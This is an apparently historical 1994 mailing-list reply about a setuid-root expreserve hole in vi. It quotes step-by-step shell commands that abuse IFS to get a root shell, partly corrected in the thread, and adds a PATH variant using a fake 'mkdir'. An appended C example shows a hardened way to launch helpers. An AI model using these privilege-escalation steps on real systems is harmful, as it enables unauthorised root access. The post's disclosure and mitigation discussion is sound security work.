Re: chmod 000 .rhosts - works?

Peter Wemm (peter@haywire.DIALix.COM)
Mon, 17 Oct 1994 23:49:56 +0800 (WST)

Charles Howes writes:
> On Sun, 16 Oct 1994, Chris Ellwood wrote:
> > Charles Howes said...
> > > ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
> > >   versions).  Expreserve is setuid root.  Expreserve runs /bin/mail
> > >   with 'system()'.  So, do the following:
> > >     % cd /tmp
> > >     % cp /bin/sh fubar
> > >     % cat > bin
> > >     chmod 4755 fubar
> > >     ^D
> > >     % chmod u+x fubar
> > 
> > I see a couple problems with the script so far.  /bin/sh was copied
> > to fubar while you are a regular user, so it will be owned by you
> > and you'll end up with a nice copy of /bin/sh that's setuid to you,
> > not your target user.  Also, that last line should probably read 
> > 'chmod u+x bin', not fubar.
> 
> Ooops, forgot the chown.  Sigh.  Trust memory to lose things.
> 
> > >     % setenv IFS=/
> > >     % vi
> > >     :pre
> > >     :q
> > >     % fubar
> > >     #
> > >   Some versions of expreserve don't have the hole.
> > >   Some versions of vi don't have the :pre command.
> > >   One does not imply the other.

Better still are the versions of expreserve that do a
system("mkdir ....");
Create a file called "mkdir" and put "." in your path.

Just out of interest, what is needed to make it safe?  Is making it
non-setuid/setgid and /usr/preserve mode 1777 sufficient?

Is there any way of subverting the "expreserve -" from the boot
scripts?

-Peter
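
Added example, not part of the original post and not code from any vendor's expreserve: one way a setuid-root program can start a helper such as /bin/mail without system(), so the invoking user's IFS and PATH never reach a shell. The name run_helper and the fixed environment values are assumptions of this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for the helper (values are assumptions of this example).
 * Nothing is inherited from the invoking user. */
static char *const clean_env[] = { "PATH=/bin:/usr/bin", "IFS= \t\n", NULL };

/* Run the helper at absolute `path` with `argv`, without a shell.
 * Returns its exit status, or -1 if it was refused or could not be run. */
int run_helper(const char *path, char *const argv[])
{
    int status;
    pid_t pid;

    if (path == NULL || path[0] != '/')  /* absolute only: no PATH lookup */
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Child: the helper needs no privilege, so drop it before exec
         * (permanent when the program is setuid root), group first,
         * and check both calls. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(127);
        execve(path, argv, clean_env);   /* no shell, so IFS splits nothing */
        _exit(127);                      /* exec failed */
    }
    while (waitpid(pid, &status, 0) < 0)
        if (errno != EINTR)
            return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed probe: the child reports the environment it was given. */
    char *probe[] = { "sh", "-c", "echo \"PATH=$PATH\"", NULL };
    printf("helper exit status: %d\n", run_helper("/bin/sh", probe));
    return 0;
}
```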